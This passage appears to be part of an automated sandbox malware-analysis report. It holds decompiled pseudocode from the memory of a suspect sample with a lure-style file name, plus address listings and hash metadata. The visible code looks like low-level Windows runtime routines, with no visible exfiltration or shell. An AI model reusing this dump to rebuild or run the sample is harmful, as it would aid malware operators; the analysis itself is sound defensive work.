												__eflags =  *(_t263 + 4) - _t327;
												if( *(_t263 + 4) != _t327) {
													goto L67;
												} else {
													_t278 =  *(_t327 + 4);
													__eflags =  *_t278 - _t327;
													if( *_t278 != _t327) {
														goto L67;
													} else {
														 *_t278 = _t263;
														 *(_t263 + 4) = _t278;
														_t113 = _t343 + 8; // 0xa0
														_t264 = _t113;
														_t278 =  *_t264;
														__eflags =  *(_t278 + 4) - _t264;
														if( *(_t278 + 4) != _t264) {
															goto L67;
														} else {
															 *_t327 = _t278;
															 *(_t327 + 4) = _t264;
															 *(_t278 + 4) = _t327;
															 *_t264 = _t327;
															_t343 =  *_t343;
															continue;
														}
													}
												}
												goto L106;
											}
											 *_t382 = _t343;
											goto L53;
										}
									}
								} else {
									 *_t382 =  *_t382 & 0x00000000;
									__eflags =  *_t382;
									goto L53;
								}
							}
						} else {
							_t268 = _t360 - 0x18;
							 *_t268 = _t225;
							 *((intOrPtr*)(_t268 + 4)) = _t299;
							 *_t299 = _t268;
							_v64 = _t268;
							continue;
						}
					}
					L106:
				}
				_t200 = _t380[3];
				__eflags = _t200;
				if(_t200 != 0) {
					_t361 =  *(_t334 + 0x10);
					asm("sbb eax, edx");
					_v76 =  *((intOrPtr*)(_t334 + 0x14));
					_t202 = E33396310( *((intOrPtr*)(_t200 + 0x10)) - _t361,  *((intOrPtr*)(_t200 + 0x14)), 0x2710, 0);
					_t292 = _v92;
					_v68 = _t202;
					_t380[0x11] = _t202;
					__eflags = _v76;
					 *_t380 = _t361;
					_t380[1] = _t292;
					_v36 = _t202 * 0x2710;
					_v32 = _t202 * 0x2710 >> 0x20;
					if(_v76 == 0) {
						_t224 = _v72 - _t361;
						__eflags = _t224;
						_t361 = _t224;
						asm("sbb ebx, ecx");
						_t292 = _t278;
						_v76 = _t292;
					}
					_v36 = _t361;
					_v32 = _t292;
					_t204 = L33363C40();
					__eflags = _t204;
					if(_t204 != 0) {
						_t207 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t207 = 0x7ffe0386;
					}
					__eflags =  *_t207;
					if( *_t207 != 0) {
						_t340 = _v52;
						E33425149(_t380, _v52, _t361, _v76);
					}
					_push( &_v28);
					_push(0);
					_push( &_v36);
					_push(_t380[4]);
					E33394490();
				} else {
					 *_t380 =  *_t380 & _t200;
					_t49 =  &(_t380[1]);
					 *_t49 = _t380[1] & _t200;
					__eflags =  *_t49;
				}
				_t279 = _v56;
				E333624D0(_t279);
				_t362 = _v72;
				while(1) {
					__eflags = _t362 -  &_v68;
					if(_t362 ==  &_v68) {
						break;
					}
					_push(_v60);
					_t340 = _t279;
					_t362 =  *_t362;
					L68();
				}
				_t214 = L33363C40();
				__eflags = _t214;
				if(_t214 != 0) {
					_t217 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				} else {
					_t217 = 0x7ffe0386;
				}
				__eflags =  *_t217;
				if( *_t217 != 0) {
					E3342505B(_t380);
				}
				_push(0);
				_push(_v60 & 0x000000ff);
				_push(0);
				_push(_t279);
				_push( &(_t380[6]));
				_push(_t380[4]);
				_push( *((intOrPtr*)(_t279 - 0x18)));
				_push(_t380[5]);
				_t221 = E333932B0();
				_pop(_t363);
				_pop(_t381);
				_pop(_t280);
				__eflags = _v40 ^ _t398;
				return E33394B50(_t221, _t280, _v40 ^ _t398, _t340, _t363, _t381);
				goto L106;
			}















































































































                                                                                                                                                                                  0x33357293
                                                                                                                                                                                  0x33357298
                                                                                                                                                                                  0x333572a2
                                                                                                                                                                                  0x333572a9
                                                                                                                                                                                  0x333572b4
                                                                                                                                                                                  0x333572b8
                                                                                                                                                                                  0x333572bc
                                                                                                                                                                                  0x333572c0
                                                                                                                                                                                  0x333572c4
                                                                                                                                                                                  0x333572cb
                                                                                                                                                                                  0x3335751c
                                                                                                                                                                                  0x33357527
                                                                                                                                                                                  0x33357527
                                                                                                                                                                                  0x3335752b
                                                                                                                                                                                  0x33357531
                                                                                                                                                                                  0x33357533
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335753c
                                                                                                                                                                                  0x3335753c
                                                                                                                                                                                  0x33357535
                                                                                                                                                                                  0x333572d1
                                                                                                                                                                                  0x333572d1
                                                                                                                                                                                  0x333572d5
                                                                                                                                                                                  0x333572d5
                                                                                                                                                                                  0x333572da
                                                                                                                                                                                  0x333572da
                                                                                                                                                                                  0x333572da
                                                                                                                                                                                  0x333572da
                                                                                                                                                                                  0x333572e4
                                                                                                                                                                                  0x333572e8
                                                                                                                                                                                  0x333572ed
                                                                                                                                                                                  0x333572f9
                                                                                                                                                                                  0x33357300
                                                                                                                                                                                  0x33357304
                                                                                                                                                                                  0x33357304
                                                                                                                                                                                  0x33357306
                                                                                                                                                                                  0x3335730c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33357540
                                                                                                                                                                                  0x33357540
                                                                                                                                                                                  0x33357312
                                                                                                                                                                                  0x33357312
                                                                                                                                                                                  0x33357316
                                                                                                                                                                                  0x3335731b
                                                                                                                                                                                  0x3335731d
                                                                                                                                                                                  0x33357320
                                                                                                                                                                                  0x33357324
                                                                                                                                                                                  0x3335732e
                                                                                                                                                                                  0x33357333
                                                                                                                                                                                  0x33357339
                                                                                                                                                                                  0x3335734b
                                                                                                                                                                                  0x3335734d
                                                                                                                                                                                  0x33357353
                                                                                                                                                                                  0x33357357
                                                                                                                                                                                  0x33357359
                                                                                                                                                                                  0x33357359
                                                                                                                                                                                  0x3335735b
                                                                                                                                                                                  0x3335735f
                                                                                                                                                                                  0x33357363
                                                                                                                                                                                  0x33357364
                                                                                                                                                                                  0x33357369
                                                                                                                                                                                  0x333b16a0
                                                                                                                                                                                  0x33357378
                                                                                                                                                                                  0x33357378
                                                                                                                                                                                  0x33357378
                                                                                                                                                                                  0x3335737f
                                                                                                                                                                                  0x33357383
                                                                                                                                                                                  0x33357387
                                                                                                                                                                                  0x33357392
                                                                                                                                                                                  0x333b16b3
                                                                                                                                                                                  0x33357398
                                                                                                                                                                                  0x33357398
                                                                                                                                                                                  0x33357398
                                                                                                                                                                                  0x333573a0
                                                                                                                                                                                  0x333b16bf
                                                                                                                                                                                  0x333b16bf
                                                                                                                                                                                  0x333573a7
                                                                                                                                                                                  0x333573ac
                                                                                                                                                                                  0x333573af
                                                                                                                                                                                  0x333573b1
                                                                                                                                                                                  0x333573b5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333573b7
                                                                                                                                                                                  0x333573ba
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333573c7
                                                                                                                                                                                  0x333573c9
                                                                                                                                                                                  0x333573ce
                                                                                                                                                                                  0x333573d4
                                                                                                                                                                                  0x333573d9
                                                                                                                                                                                  0x333573dd
                                                                                                                                                                                  0x333573e1
                                                                                                                                                                                  0x333573e7
                                                                                                                                                                                  0x33357549
                                                                                                                                                                                  0x3335754a
                                                                                                                                                                                  0x3335754c
                                                                                                                                                                                  0x3335754e
                                                                                                                                                                                  0x33357550
                                                                                                                                                                                  0x3335755f
                                                                                                                                                                                  0x33357561
                                                                                                                                                                                  0x33357564
                                                                                                                                                                                  0x33357597
                                                                                                                                                                                  0x33357599
                                                                                                                                                                                  0x3335759a
                                                                                                                                                                                  0x33357566
                                                                                                                                                                                  0x33357566
                                                                                                                                                                                  0x33357567
                                                                                                                                                                                  0x3335756a
                                                                                                                                                                                  0x3335756b
                                                                                                                                                                                  0x3335756d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335756f
                                                                                                                                                                                  0x3335756f
                                                                                                                                                                                  0x33357571
                                                                                                                                                                                  0x33357574
                                                                                                                                                                                  0x33357574
                                                                                                                                                                                  0x33357577
                                                                                                                                                                                  0x3335757a
                                                                                                                                                                                  0x3335757c
                                                                                                                                                                                  0x3335757e
                                                                                                                                                                                  0x33357580
                                                                                                                                                                                  0x33357583
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33357585
                                                                                                                                                                                  0x33357585
                                                                                                                                                                                  0x33357587
                                                                                                                                                                                  0x3335758a
                                                                                                                                                                                  0x3335758d
                                                                                                                                                                                  0x3335758f
                                                                                                                                                                                  0x33357591
                                                                                                                                                                                  0x33357592
                                                                                                                                                                                  0x33357594
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33357594
                                                                                                                                                                                  0x33357583
                                                                                                                                                                                  0x3335756d
                                                                                                                                                                                  0x33357552
                                                                                                                                                                                  0x33357552
                                                                                                                                                                                  0x33357552
                                                                                                                                                                                  0x33357556
                                                                                                                                                                                  0x33357556
                                                                                                                                                                                  0x3335759e
                                                                                                                                                                                  0x3335759f
                                                                                                                                                                                  0x333575a1
                                                                                                                                                                                  0x333575a2
                                                                                                                                                                                  0x333575a4
                                                                                                                                                                                  0x333575a6
                                                                                                                                                                                  0x333575b4
                                                                                                                                                                                  0x333575b8
                                                                                                                                                                                  0x333575a8
                                                                                                                                                                                  0x333575a8
                                                                                                                                                                                  0x333575a8
                                                                                                                                                                                  0x333575ab
                                                                                                                                                                                  0x333575ad
                                                                                                                                                                                  0x333575af
                                                                                                                                                                                  0x333575b9
                                                                                                                                                                                  0x333575bc
                                                                                                                                                                                  0x3335761e
                                                                                                                                                                                  0x33357620
                                                                                                                                                                                  0x33357621
                                                                                                                                                                                  0x33357625
                                                                                                                                                                                  0x3335762b
                                                                                                                                                                                  0x3335762c
                                                                                                                                                                                  0x3335762d
                                                                                                                                                                                  0x3335762e
                                                                                                                                                                                  0x33357630
                                                                                                                                                                                  0x33357632
                                                                                                                                                                                  0x33357635
                                                                                                                                                                                  0x33357638
                                                                                                                                                                                  0x3335763d
                                                                                                                                                                                  0x3335763f
                                                                                                                                                                                  0x333b171a
                                                                                                                                                                                  0x33357645
                                                                                                                                                                                  0x33357645
                                                                                                                                                                                  0x33357645
                                                                                                                                                                                  0x3335764a
                                                                                                                                                                                  0x3335764d
                                                                                                                                                                                  0x333b1728
                                                                                                                                                                                  0x333b1737
                                                                                                                                                                                  0x333b1737
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33357653
                                                                                                                                                                                  0x33357653
                                                                                                                                                                                  0x33357653
                                                                                                                                                                                  0x33357653
                                                                                                                                                                                  0x33357653
                                                                                                                                                                                  0x33357653
                                                                                                                                                                                  0x3335765d
                                                                                                                                                                                  0x33357663
                                                                                                                                                                                  0x33357666
                                                                                                                                                                                  0x33357673
                                                                                                                                                                                  0x33357676
                                                                                                                                                                                  0x3335767f
                                                                                                                                                                                  0x3335767f
                                                                                                                                                                                  0x33357681
                                                                                                                                                                                  0x33357685
                                                                                                                                                                                  0x33357687
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333577f2
                                                                                                                                                                                  0x333577f2
                                                                                                                                                                                  0x3335768d
                                                                                                                                                                                  0x3335768d
                                                                                                                                                                                  0x33357695
                                                                                                                                                                                  0x33357698
                                                                                                                                                                                  0x3335769a
                                                                                                                                                                                  0x3335769d
                                                                                                                                                                                  0x333576a0
                                                                                                                                                                                  0x333576a0
                                                                                                                                                                                  0x333576a5
                                                                                                                                                                                  0x333576a5
                                                                                                                                                                                  0x333576a9
                                                                                                                                                                                  0x333576ae
                                                                                                                                                                                  0x333576b4
                                                                                                                                                                                  0x333576b7
                                                                                                                                                                                  0x333576ba
                                                                                                                                                                                  0x333576ba
                                                                                                                                                                                  0x333576be
                                                                                                                                                                                  0x333576be
                                                                                                                                                                                  0x333576c6
                                                                                                                                                                                  0x333576c8
                                                                                                                                                                                  0x333576ca
                                                                                                                                                                                  0x333576cd
                                                                                                                                                                                  0x333576cf
                                                                                                                                                                                  0x333576d6
                                                                                                                                                                                  0x333576db
                                                                                                                                                                                  0x333576e3
                                                                                                                                                                                  0x333576e9
                                                                                                                                                                                  0x333576eb
                                                                                                                                                                                  0x333b1747
                                                                                                                                                                                  0x333b174e
                                                                                                                                                                                  0x333b1754
                                                                                                                                                                                  0x333b175a
                                                                                                                                                                                  0x333b1760
                                                                                                                                                                                  0x333b1766
                                                                                                                                                                                  0x333b176d
                                                                                                                                                                                  0x333576f1
                                                                                                                                                                                  0x333576f1
                                                                                                                                                                                  0x333576f7
                                                                                                                                                                                  0x333577cf
                                                                                                                                                                                  0x333577d5
                                                                                                                                                                                  0x333577dd
                                                                                                                                                                                  0x333577e2
                                                                                                                                                                                  0x333577e4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333577e6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333577e6
                                                                                                                                                                                  0x33357797
                                                                                                                                                                                  0x3335779b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333576fd
                                                                                                                                                                                  0x333576fd
                                                                                                                                                                                  0x33357703
                                                                                                                                                                                  0x33357705
                                                                                                                                                                                  0x33357707
                                                                                                                                                                                  0x3335770a
                                                                                                                                                                                  0x333577e8
                                                                                                                                                                                  0x333577ea
                                                                                                                                                                                  0x33357710
                                                                                                                                                                                  0x33357716
                                                                                                                                                                                  0x3335771c
                                                                                                                                                                                  0x3335771c
                                                                                                                                                                                  0x3335771f
                                                                                                                                                                                  0x33357726
                                                                                                                                                                                  0x33357726
                                                                                                                                                                                  0x33357728
                                                                                                                                                                                  0x3335772a
                                                                                                                                                                                  0x3335772d
                                                                                                                                                                                  0x33357730
                                                                                                                                                                                  0x33357732
                                                                                                                                                                                  0x33357735
                                                                                                                                                                                  0x33357738
                                                                                                                                                                                  0x3335773b
                                                                                                                                                                                  0x33357741
                                                                                                                                                                                  0x33357747
                                                                                                                                                                                  0x33357749
                                                                                                                                                                                  0x3335774b
                                                                                                                                                                                  0x3335779e
                                                                                                                                                                                  0x333577a9
                                                                                                                                                                                  0x333577ae
                                                                                                                                                                                  0x333577b8
                                                                                                                                                                                  0x333577bb
                                                                                                                                                                                  0x333577bf
                                                                                                                                                                                  0x333577c5
                                                                                                                                                                                  0x333577c7
                                                                                                                                                                                  0x3335774d
                                                                                                                                                                                  0x3335774d
                                                                                                                                                                                  0x3335774f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335774f
                                                                                                                                                                                  0x3335774b
                                                                                                                                                                                  0x33357751
                                                                                                                                                                                  0x33357754
                                                                                                                                                                                  0x33357758
                                                                                                                                                                                  0x3335775f
                                                                                                                                                                                  0x33357762
                                                                                                                                                                                  0x33357767
                                                                                                                                                                                  0x33357769
                                                                                                                                                                                  0x3335776c
                                                                                                                                                                                  0x33357772
                                                                                                                                                                                  0x33357772
                                                                                                                                                                                  0x33357777
                                                                                                                                                                                  0x33357779
                                                                                                                                                                                  0x33357779
                                                                                                                                                                                  0x3335777e
                                                                                                                                                                                  0x3335777e
                                                                                                                                                                                  0x33357785
                                                                                                                                                                                  0x33357785
                                                                                                                                                                                  0x3335778a
                                                                                                                                                                                  0x3335778a
                                                                                                                                                                                  0x3335778d
                                                                                                                                                                                  0x33357791
                                                                                                                                                                                  0x333b177f
                                                                                                                                                                                  0x333b1785
                                                                                                                                                                                  0x333b1785
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333575be
                                                                                                                                                                                  0x333575be
                                                                                                                                                                                  0x333575c1
                                                                                                                                                                                  0x333575c3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333575c5
                                                                                                                                                                                  0x333575c5
                                                                                                                                                                                  0x333575c7
                                                                                                                                                                                  0x333575ca
                                                                                                                                                                                  0x333575cd
                                                                                                                                                                                  0x333575cf
                                                                                                                                                                                  0x333575d0
                                                                                                                                                                                  0x333575d0
                                                                                                                                                                                  0x333575d2
                                                                                                                                                                                  0x333575d4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333575d9
                                                                                                                                                                                  0x333575dc
                                                                                                                                                                                  0x333575de
                                                                                                                                                                                  0x333575e8
                                                                                                                                                                                  0x333575e8
                                                                                                                                                                                  0x333575ea
                                                                                                                                                                                  0x333575ec
                                                                                                                                                                                  0x333575e0
                                                                                                                                                                                  0x333575e3
                                                                                                                                                                                  0x333575e6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333575e6
                                                                                                                                                                                  0x333575de
                                                                                                                                                                                  0x333575ee
                                                                                                                                                                                  0x333575f0
                                                                                                                                                                                  0x333575f3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333575f5
                                                                                                                                                                                  0x333575f5
                                                                                                                                                                                  0x333575f8
                                                                                                                                                                                  0x333575fa
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333575fc
                                                                                                                                                                                  0x333575fc
                                                                                                                                                                                  0x333575fe
                                                                                                                                                                                  0x33357601
                                                                                                                                                                                  0x33357601
                                                                                                                                                                                  0x33357604
                                                                                                                                                                                  0x33357606
                                                                                                                                                                                  0x33357609
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335760b
                                                                                                                                                                                  0x3335760b
                                                                                                                                                                                  0x3335760d
                                                                                                                                                                                  0x33357610
                                                                                                                                                                                  0x33357613
                                                                                                                                                                                  0x33357615
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33357615
                                                                                                                                                                                  0x33357609
                                                                                                                                                                                  0x333575fa
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333575f3
                                                                                                                                                                                  0x33357619
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335761b
                                                                                                                                                                                  0x333575c3
                                                                                                                                                                                  0x333575b1
                                                                                                                                                                                  0x333575b1
                                                                                                                                                                                  0x333575b1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333575b1
                                                                                                                                                                                  0x333575af
                                                                                                                                                                                  0x333573ed
                                                                                                                                                                                  0x333573ef
                                                                                                                                                                                  0x333573f2
                                                                                                                                                                                  0x333573f4
                                                                                                                                                                                  0x333573f7
                                                                                                                                                                                  0x333573f9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333573f9
                                                                                                                                                                                  0x333573e7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333573ba
                                                                                                                                                                                  0x333573ff
                                                                                                                                                                                  0x33357402
                                                                                                                                                                                  0x33357404
                                                                                                                                                                                  0x33357485
                                                                                                                                                                                  0x33357490
                                                                                                                                                                                  0x33357492
                                                                                                                                                                                  0x333574a0
                                                                                                                                                                                  0x333574a5
                                                                                                                                                                                  0x333574ae
                                                                                                                                                                                  0x333574b2
                                                                                                                                                                                  0x333574b7
                                                                                                                                                                                  0x333574bc
                                                                                                                                                                                  0x333574be
                                                                                                                                                                                  0x333574c1
                                                                                                                                                                                  0x333574c5
                                                                                                                                                                                  0x333574c9
                                                                                                                                                                                  0x333574cf
                                                                                                                                                                                  0x333574cf
                                                                                                                                                                                  0x333574d1
                                                                                                                                                                                  0x333574d3
                                                                                                                                                                                  0x333574d5
                                                                                                                                                                                  0x333574d7
                                                                                                                                                                                  0x333574d7
                                                                                                                                                                                  0x333574db
                                                                                                                                                                                  0x333574df
                                                                                                                                                                                  0x333574e3
                                                                                                                                                                                  0x333574e8
                                                                                                                                                                                  0x333574ea
                                                                                                                                                                                  0x333b16d2
                                                                                                                                                                                  0x333574f0
                                                                                                                                                                                  0x333574f0
                                                                                                                                                                                  0x333574f0
                                                                                                                                                                                  0x333574f5
                                                                                                                                                                                  0x333574f8
                                                                                                                                                                                  0x333b16e3
                                                                                                                                                                                  0x333b16e8
                                                                                                                                                                                  0x333b16e8
                                                                                                                                                                                  0x33357502
                                                                                                                                                                                  0x33357503
                                                                                                                                                                                  0x33357509
                                                                                                                                                                                  0x3335750a
                                                                                                                                                                                  0x3335750d
                                                                                                                                                                                  0x33357406
                                                                                                                                                                                  0x33357406
                                                                                                                                                                                  0x33357408
                                                                                                                                                                                  0x33357408
                                                                                                                                                                                  0x33357408
                                                                                                                                                                                  0x33357408
                                                                                                                                                                                  0x3335740b
                                                                                                                                                                                  0x33357410
                                                                                                                                                                                  0x33357415
                                                                                                                                                                                  0x3335742e
                                                                                                                                                                                  0x33357432
                                                                                                                                                                                  0x33357434
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335741b
                                                                                                                                                                                  0x33357425
                                                                                                                                                                                  0x33357427
                                                                                                                                                                                  0x33357429
                                                                                                                                                                                  0x33357429
                                                                                                                                                                                  0x33357436
                                                                                                                                                                                  0x3335743b
                                                                                                                                                                                  0x3335743d
                                                                                                                                                                                  0x333b16fb
                                                                                                                                                                                  0x33357443
                                                                                                                                                                                  0x33357443
                                                                                                                                                                                  0x33357443
                                                                                                                                                                                  0x33357448
                                                                                                                                                                                  0x3335744b
                                                                                                                                                                                  0x333b1707
                                                                                                                                                                                  0x333b1707
                                                                                                                                                                                  0x33357456
                                                                                                                                                                                  0x33357458
                                                                                                                                                                                  0x33357459
                                                                                                                                                                                  0x3335745b
                                                                                                                                                                                  0x3335745f
                                                                                                                                                                                  0x33357460
                                                                                                                                                                                  0x33357463
                                                                                                                                                                                  0x33357466
                                                                                                                                                                                  0x33357469
                                                                                                                                                                                  0x33357472
                                                                                                                                                                                  0x33357473
                                                                                                                                                                                  0x33357474
                                                                                                                                                                                  0x33357475
                                                                                                                                                                                  0x3335747f
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: b46f8229c97cdce52d41f82a4cf508c72868c769528f41f2ef1aae7fcb3e60d3
                                                                                                                                                                                  • Instruction ID: bc40ccf7633f009e8b54146a63ac4df32fc2f650ac38d179ae4ab7769d71bf59
                                                                                                                                                                                  • Opcode Fuzzy Hash: b46f8229c97cdce52d41f82a4cf508c72868c769528f41f2ef1aae7fcb3e60d3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 04A12AB5A08341CFE314CF29C480E1ABBE9FB88754F15896DF5859B750EB30E945CB92
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3340B0AF Relevance: .2, Instructions: 222COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                  			E3340B0AF(signed int __ecx, signed char __edx, signed int _a4, signed int _a8, void* _a12, signed int* _a16, short* _a20) {
				void* _v8;
				signed char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				char _v36;
				signed int _t73;
				signed int _t77;
				void* _t86;
				void* _t91;
				signed int _t97;
				signed int _t101;
				signed int _t113;
				signed int _t114;
				signed int _t116;
				intOrPtr _t119;
				signed int _t122;
				intOrPtr _t124;
				signed char _t127;
				signed int _t129;
				void* _t130;
				intOrPtr _t131;
				intOrPtr _t132;
				intOrPtr _t134;
				intOrPtr _t139;
				void* _t140;
				signed int* _t141;
				short* _t142;
				signed int _t143;

				_t127 = __edx;
				_t140 = 0;
				_v12 = __edx;
				_v24 = _v24 & 0;
				_t113 = __ecx;
				_t116 = _a8;
				_t73 = 0;
				_v28 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_t137 = _a4;
				if(__edx != _t116) {
					if(__edx == 0 || _t116 == 0) {
						L53:
						_t114 = 0;
						goto L54;
					} else {
						_t142 = _a20;
						if(_t142 != 0) {
							 *_t142 = 0xffffffff;
						}
						if(_t127 != 2) {
							if(_t116 != 2) {
								if(_t127 != 1) {
									if(_t127 != 3 || _t116 != 1) {
										goto L52;
									} else {
										_t130 = 0x55;
										_t140 = E3334D818(_t116, _t130);
										if(_t140 == 0) {
											goto L53;
										}
										_v32 = _t140;
										_v36 = 0xaa0000;
										if(E33374F40(_a12,  &_v36) == 0) {
											goto L53;
										}
										_t131 =  *((intOrPtr*)(_t113 + 0x18));
										_t137 = _a4;
										if(_t131 == 0 || _t137 < 0) {
											L48:
											_t86 = 0;
											goto L49;
										} else {
											_t122 = _t137;
											if(_t122 >= ( *(_t131 + 6) & 0x0000ffff)) {
												goto L48;
											}
											_t86 =  *((intOrPtr*)(_t131 + 0x10)) +  *( *((intOrPtr*)(_t131 + 0xc)) + _t122 * 2) * 2;
											L49:
											if(_t86 == 0 || E333979A0(_v32, _t86) != 0) {
												goto L53;
											} else {
												_t114 = 1;
												L54:
												if(_t140 != 0) {
													E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t140);
												}
												goto L11;
											}
										}
									}
								}
								if(_t116 != 3) {
									goto L52;
								}
								_t132 =  *((intOrPtr*)(_t113 + 0x18));
								if(_t132 == 0) {
									L36:
									_t91 = 0;
									L37:
									if(_t91 == 0) {
										goto L52;
									}
									E33395050(_t116,  &_v36, _t91);
									if(E333756E0( &_v36,  &_v20) == 0) {
										goto L52;
									}
									_t137 = _a4;
									_t114 = _t113 & 0xffffff00 | _a4 == _v20;
									goto L11;
								}
								_t97 = _a12;
								if(_t97 < 0) {
									goto L36;
								}
								_t116 = _t97;
								if(_t116 >= ( *(_t132 + 6) & 0x0000ffff)) {
									goto L36;
								}
								_t91 =  *((intOrPtr*)(_t132 + 0x10)) + _t116 * 2;
								goto L37;
							}
							if(_t113 == 0) {
								goto L52;
							}
							_t101 = _a12;
							if(_t101 < 0) {
								goto L52;
							}
							_t124 =  *((intOrPtr*)(_t113 + 0x14));
							_v20 = _t101;
							if(_v20 >= ( *(_t124 + 6) & 0x0000ffff)) {
								goto L52;
							}
							_t137 = _a4;
							_v16 = _v20 * 0x1c +  *((intOrPtr*)(_t124 + 0xc));
							_t114 = E3340BB40(_t113, _v20 * 0x1c +  *((intOrPtr*)(_t124 + 0xc)), _t127, _a4);
							_t73 = _v16;
							if(_t114 == 0 || _t73 == 0) {
								_t127 = _v12;
								goto L13;
							} else {
								_t127 = _v12;
								if(_t142 == 0) {
									goto L13;
								}
								 *_t142 = _a12;
								goto L12;
							}
						} else {
							if(_t113 == 0 || _t137 < 0) {
								L52:
								_t140 = _v8;
								goto L53;
							} else {
								_t134 =  *((intOrPtr*)(_t113 + 0x14));
								_t143 = _t137;
								if(_t143 >= ( *(_t134 + 6) & 0x0000ffff)) {
									goto L52;
								}
								_v24 = _t143 * 0x1c +  *((intOrPtr*)(_t134 + 0xc));
								_t114 = E3340BB40(_t113, _t143 * 0x1c +  *((intOrPtr*)(_t134 + 0xc)), _t116, _a12);
								L11:
								_t127 = _v12;
								L12:
								_t73 = _v16;
								L13:
								_t141 = _a16;
								if(_t141 == 0) {
									L58:
									return _t114;
								}
								if(_t114 == 0) {
									 *_t141 =  *_t141 & 0x00000000;
									goto L58;
								}
								if(_t73 != 0) {
									L21:
									 *_t141 = _t73;
									goto L58;
								}
								_t73 = _v24;
								if(_t73 != 0) {
									goto L21;
								}
								 *_t141 =  *_t141 & _t73;
								_t139 = _v28;
								if(E33374EDF(_t139, _t127 & 0x000000ff, _t137,  &_v8) < 0) {
									goto L58;
								}
								_t77 = _v8;
								if(0 > _t77) {
									goto L58;
								}
								_t119 =  *((intOrPtr*)(_t139 + 0x14));
								_t129 = _t77;
								if(_t129 >= ( *(_t119 + 6) & 0x0000ffff)) {
									goto L58;
								}
								_t73 = _t129 * 0x1c +  *((intOrPtr*)(_t119 + 0xc));
								goto L21;
							}
						}
					}
				}
				_t114 = __ecx & 0xffffff00 | _t137 == _a12;
				goto L13;
			}


































                                                                                                                                                                                  0x3340b0af
                                                                                                                                                                                  0x3340b0b9
                                                                                                                                                                                  0x3340b0bb
                                                                                                                                                                                  0x3340b0be
                                                                                                                                                                                  0x3340b0c1
                                                                                                                                                                                  0x3340b0c3
                                                                                                                                                                                  0x3340b0c6
                                                                                                                                                                                  0x3340b0c8
                                                                                                                                                                                  0x3340b0cb
                                                                                                                                                                                  0x3340b0ce
                                                                                                                                                                                  0x3340b0d2
                                                                                                                                                                                  0x3340b0d7
                                                                                                                                                                                  0x3340b0e4
                                                                                                                                                                                  0x3340b309
                                                                                                                                                                                  0x3340b309
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3340b0f2
                                                                                                                                                                                  0x3340b0f2
                                                                                                                                                                                  0x3340b0f7
                                                                                                                                                                                  0x3340b0fc
                                                                                                                                                                                  0x3340b0fc
                                                                                                                                                                                  0x3340b102
                                                                                                                                                                                  0x3340b1b4
                                                                                                                                                                                  0x3340b224
                                                                                                                                                                                  0x3340b293
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3340b29a
                                                                                                                                                                                  0x3340b29c
                                                                                                                                                                                  0x3340b2a2
                                                                                                                                                                                  0x3340b2a6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3340b2ab
                                                                                                                                                                                  0x3340b2b4
                                                                                                                                                                                  0x3340b2c2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3340b2c4
                                                                                                                                                                                  0x3340b2c7
